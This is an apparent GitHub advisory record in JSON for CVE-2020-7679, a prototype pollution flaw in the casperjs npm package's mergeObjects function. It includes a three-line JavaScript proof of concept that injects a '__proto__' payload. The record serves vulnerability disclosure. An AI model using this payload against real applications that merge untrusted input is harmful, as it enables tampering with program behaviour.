{"id":"GHSA-vrr3-5r3v-7xfw","summary":"Improperly Controlled Modification of Dynamically-Determined Object Attributes in casperjs","details":"### Overview\ncasperjs is a navigation scripting & testing utility for PhantomJS and SlimerJS.\n\nAffected versions of this package are vulnerable to Prototype Pollution via the mergeObjects utility function.\n\n### PoC\n```js\nvar payload = JSON.parse('{\"__proto__\": {\"a\": \"pwned\"}}');\nmergeObjects({}, payload);\nconsole.log({}.a); // prints \"pwned\"\n```","aliases":["CVE-2020-7679"],"modified":"2023-11-08T04:04:04.341567Z","published":"2021-05-17T21:00:52Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2021-05-11T22:26:54Z","nvd_published_at":"2020-06-19T11:15:00Z","cwe_ids":["CWE-1321","CWE-915"],"severity":"HIGH"},"references":[{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-7679"},{"type":"PACKAGE","url":"https://github.com/casperjs/casperjs"},{"type":"WEB","url":"https://github.com/casperjs/casperjs/blob/master/modules/utils.js%23L680"},{"type":"WEB","url":"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-572804"},{"type":"WEB","url":"https://snyk.io/vuln/SNYK-JS-CASPERJS-572803"}],"affected":[{"package":{"name":"casperjs","ecosystem":"npm","purl":"pkg:npm/casperjs"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"last_affected":"1.1.4"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-vrr3-5r3v-7xfw/GHSA-vrr3-5r3v-7xfw.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}]}